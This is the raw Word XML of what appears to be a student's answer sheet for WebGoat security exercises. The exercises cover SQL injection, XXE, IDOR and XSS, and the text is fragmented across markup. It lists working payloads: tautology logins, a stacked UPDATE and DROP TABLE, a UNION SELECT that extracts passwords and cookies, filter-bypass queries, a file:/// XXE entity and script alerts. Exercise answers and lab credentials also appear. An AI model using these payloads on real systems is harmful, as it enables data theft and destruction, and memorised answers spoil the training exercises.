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D944" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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A1: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Injection Intro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFBDDBF" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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select department from employees where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5B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>96134;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3276AC46" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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UPDATE employees SET department='Sales' WHERE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first_name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='Tobi'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBBC2A3" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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alter table employees add phone </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972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005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7726AC72" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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grant all on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grant_rights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unauthorized_user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5B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9)Smith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 ‘ or ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B28B53" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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Login count: 0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User_Is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: 0 or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5997B702" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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Employee name: A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Authentication Tan:' OR '1' = '1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54A8FC" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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Employee </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972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Authentication Tan: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 xml:space="preserve">'; UPDATE employees SET salary=99999 WHERE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first_name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='John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E39C8B" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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%'; DROP TABLE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access_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972"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;-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3972"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24F967E6" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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Injection Advanced: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5B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3)Name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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: '; SELECT * FROM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user_system_data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;-- or ' UNION SELECT 1,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user_name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, password, cookie, 'A', 'B', 1 from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user_system_data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;--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Password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F13AF82" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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Login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Username: tom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 xml:space="preserve">Password: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thisisasecretfortomonly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0140D69D" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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Quiz: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4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3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2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3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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F75E3FB" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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Injection Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7EEB2" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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 box: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getConnection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 xml:space="preserve">2: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PreparedStatement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 xml:space="preserve">3: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prepareStatement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4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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5:?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</w:r>
      <w:r w:rsidRPr="005B397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6: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setString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 xml:space="preserve">7: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setString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="234D1831" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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try {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 xml:space="preserve">Connection conn =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DriverManager.getConnection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(DBURL, DBUSER, DBPW);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PreparedStatement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B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>conn.prepareStatement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>("SELECT * FROM users WHERE name = ?");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ps.setString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(1, "Admin");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ps.executeUpdate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();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} catch (Exception e) {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("Oops. Something went wrong!");</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA5D2C9" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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a';/**/select/**/*/**/from/**/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user_system_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972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;-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3972"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779451B1" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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a';/**/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seselectlect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/**/*/**/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frfromom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/**/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user_system_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972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5B3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3972"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100EE9FE" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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3972">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>104.130.219.202</w:t>
      </w:r>
      <w:r w:rsidR="00D972CD" w:rsidRPr="00D972CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:pict w14:anchorId="1FFA5830">
          <v:rect id="_x0000_i1025" alt="" style="width:431.9pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hrpct="957" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#464a4c" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27335DF6" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:p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>A3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A8720B" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:p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b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Username</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3972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5B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CaptainJack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="712BFB5E" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:p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 xml:space="preserve">      Password:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BlackPearl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F572A3A" w14:textId="77777777" w:rsidR="00CC3769" w:rsidRPr="005B3972" w:rsidRDefault="00CC3769">
      <w:p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>A4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFBCE43" w14:textId="77777777" w:rsidR="00CC3769" w:rsidRPr="005B3972" w:rsidRDefault="00CC3769">
      <w:p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 xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00670873" w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;?xml version="1.0"?&gt;&lt;!DOCTYPE </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>comment[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///"&gt;]&gt;&lt;comment&gt;  &lt;text&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;&lt;/text&gt;&lt;/comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102495FE" w14:textId="77777777" w:rsidR="00670873" w:rsidRPr="005B3972" w:rsidRDefault="00670873">
      <w:p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 xml:space="preserve">        7. &lt;?xml version="1.0"?&gt;&lt;!DOCTYPE </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>comment[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///"&gt;]&gt;&lt;comment&gt;  &lt;text&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;&lt;/text&gt;&lt;/comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669AE6D8" w14:textId="77777777" w:rsidR="00670873" w:rsidRPr="005B3972" w:rsidRDefault="00670873">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b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 xml:space="preserve">Then change the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F96E7CD" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:p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>A5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B477C90" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877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 xml:space="preserve">2.tom   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40827907" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:pPr>
        <w:ind w:left="360"/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 xml:space="preserve">           Cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869DDC7" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:pPr>
        <w:ind w:left="360"/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lastRenderedPageBreak/>
        <w:t xml:space="preserve">       3.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>role,userid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="406E0C23" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:pPr>
        <w:ind w:left="360"/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 xml:space="preserve">       4.WebGoat/IDOR/profile/2342384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D46352" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:p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 xml:space="preserve">    2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F31B00" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:p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 xml:space="preserve">         2.Users   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175FC384" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="00747877">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">             Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4807FC" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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A7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18672697" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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 xml:space="preserve">Go to </w:t>
      </w:r>
      <w:proofErr w:type="spell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Downloadsmore</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spell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toolsweb</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> developer fools console will open In console type, alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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) ;</w:t>
      </w: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br/>
        <w:t>It will show alert msg click ok then again type</w:t>
      </w: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br/>
        <w:t>Alert(</w:t>
      </w:r>
      <w:proofErr w:type="spell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document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spell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) ;</w:t>
      </w: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br/>
        <w:t xml:space="preserve">Then in the 2 </w:t>
      </w:r>
      <w:proofErr w:type="spell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nd</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> exercise type YES and click Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484032BE" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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In that shopping cart</w:t>
      </w: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br/>
        <w:t xml:space="preserve">In enter your credit </w:t>
      </w:r>
      <w:proofErr w:type="gram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card :</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve"> remove that number</w:t>
      </w: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br/>
        <w:t>Type &lt;script&gt;alert(“username”) &lt;/script&gt;</w:t>
      </w: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br/>
        <w:t>Example &lt;script&gt;alert(“</w:t>
      </w:r>
      <w:proofErr w:type="spell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sankamethra</w:t>
      </w:r>
      <w:proofErr w:type="spell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”) &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E76C3A" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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 xml:space="preserve">Type, </w:t>
      </w:r>
      <w:proofErr w:type="spell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start.mvc#test</w:t>
      </w:r>
      <w:proofErr w:type="spell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/ and click submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062FD8AC" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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In console, type</w:t>
      </w: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br/>
      </w:r>
      <w:proofErr w:type="spell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Webgoat.custom</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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js.phoneHome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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()</w:t>
      </w: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br/>
        <w:t>We can see the response code like -236547</w:t>
      </w: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br/>
        <w:t xml:space="preserve">Copy and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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paster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> and click submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7497EBAA" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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Quiz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0338C6E8" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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Solution 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3433665C" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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Solution 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA941E" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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Solution 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C411252" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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Solution 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1768C250" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="007478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64A4C"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="464A4C"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Solution 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F3278B" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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464A4C"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1340C6FB" w14:textId="77777777" w:rsidR="00747877" w:rsidRPr="005B3972" w:rsidRDefault="00747877" w:rsidP="0074787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464A4C"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7796EEB1" w14:textId="00FD6AF8" w:rsidR="00FA0781" w:rsidRPr="005B3972" w:rsidRDefault="00FA0781" w:rsidP="00FA07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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ans</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="005B3972">
        <w:rPr>
          <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>https://docs.cycubix.com/web-application-security-essentials/solutions/a2-broken-authentication/jwt-tokens-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371E499A" w14:textId="50750C27" w:rsidR="00670873" w:rsidRDefault="00670873">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35601AAC" w14:textId="593EE15C" w:rsidR="00656802" w:rsidRDefault="0065680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A2 - </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="002D302D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
